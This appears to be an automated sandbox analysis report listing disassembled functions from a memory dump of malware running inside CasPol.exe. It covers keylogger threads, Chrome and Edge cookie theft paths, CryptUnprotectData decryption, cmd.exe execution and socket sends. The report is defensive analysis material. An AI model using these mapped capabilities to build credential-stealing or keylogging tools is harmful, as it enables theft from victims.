                            Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 004509D4
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 004509E6
                            • _free.LIBCMT ref: 004509F8
                            • _free.LIBCMT ref: 00450A0A
                            • _free.LIBCMT ref: 00450A1C
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                            • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                            • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                            • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                            Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00444066
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00444078
                            • _free.LIBCMT ref: 0044408B
                            • _free.LIBCMT ref: 0044409C
                            • _free.LIBCMT ref: 004440AD
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                            • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                            • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                            • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                            Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                            • _strpbrk.LIBCMT ref: 0044E738
                            • _free.LIBCMT ref: 0044E855
                              • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                              • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                              • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                            • String ID: *?$.
                            • API String ID: 2812119850-3972193922
                            • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                            • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                            • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                            • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                            Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                              • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                              • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFileKeyboardLayoutNameconnectsend
                            • String ID: XQG$NG$PG
                            • API String ID: 1634807452-3565412412
                            • Opcode ID: 540faca1283a201b615fa294366106f171e649dc374ea9aa343cf977934f0195
                            • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                            • Opcode Fuzzy Hash: 540faca1283a201b615fa294366106f171e649dc374ea9aa343cf977934f0195
                            • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                            Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: `#D$`#D
                            • API String ID: 885266447-2450397995
                            • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                            • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                            • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                            • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                            Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00443475
                            • _free.LIBCMT ref: 00443540
                            • _free.LIBCMT ref: 0044354A
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            • API String ID: 2506810119-3657627342
                            • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                            • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                            • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                            • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                            Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                            • String ID: /sort "Visit Time" /stext "$0NG
                            • API String ID: 368326130-3219657780
                            • Opcode ID: 3041f1bf41341a7a35509bb268a87c49b4086886f3ef8ac56f6be550602b56b3
                            • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                            • Opcode Fuzzy Hash: 3041f1bf41341a7a35509bb268a87c49b4086886f3ef8ac56f6be550602b56b3
                            • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                            Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 004162F5
                              • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                              • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                              • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                              • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen$CloseCreateValue
                            • String ID: !D@$okmode$PG
                            • API String ID: 3411444782-3370592832
                            • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                            • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                            • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                            • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                            Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                            • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                            Strings
                            • User Data\Default\Network\Cookies, xrefs: 0040C603
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                            • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                            • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                            • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                            Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                            • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                            Strings
                            • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                            • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                            • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                            • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                            Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                            • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                            • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTimewsprintf
                            • String ID: Offline Keylogger Started
                            • API String ID: 465354869-4114347211
                            • Opcode ID: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                            • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                            • Opcode Fuzzy Hash: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                            • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                            Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                            • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTime$wsprintf
                            • String ID: Online Keylogger Started
                            • API String ID: 112202259-1258561607
                            • Opcode ID: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                            • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                            • Opcode Fuzzy Hash: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                            • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                            Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                            • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: CryptUnprotectData$crypt32
                            • API String ID: 2574300362-2380590389
                            • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                            • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                            • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                            • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                            Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                            • CloseHandle.KERNEL32(?), ref: 004051CA
                            • SetEvent.KERNEL32(?), ref: 004051D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandleObjectSingleWait
                            • String ID: Connection Timeout
                            • API String ID: 2055531096-499159329
                            • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                            • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                            • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                            • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                            Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8Throw
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 2005118841-1866435925
                            • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                            • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                            • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                            • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                            Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                            • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                            • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                            • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                            • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                            • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                            Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                              • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                              • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                            • String ID: bad locale name
                            • API String ID: 3628047217-1405518554
                            • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                            • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                            • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                            • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                            Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                            • ShowWindow.USER32(00000009), ref: 00416C61
                            • SetForegroundWindow.USER32 ref: 00416C6D
                              • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                              • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                              • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                            • String ID: !D@
                            • API String ID: 3446828153-604454484
                            • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                            • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                            • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                            • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                            Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: /C $cmd.exe$open
                            • API String ID: 587946157-3896048727
                            • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                            • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                            • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                            • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                            Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                            Download Yara Rule
                            APIs
                            • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                            • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                            • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: TerminateThread$HookUnhookWindows
                            • String ID: pth_unenc
                            • API String ID: 3123878439-4028850238
                            • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                            • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                            • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                            • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                            Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                            • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: GetCursorInfo$User32.dll
                            • API String ID: 1646373207-2714051624
                            • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                            • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                            • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                            • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                            Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                            • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetLastInputInfo$User32.dll
                            • API String ID: 2574300362-1519888992
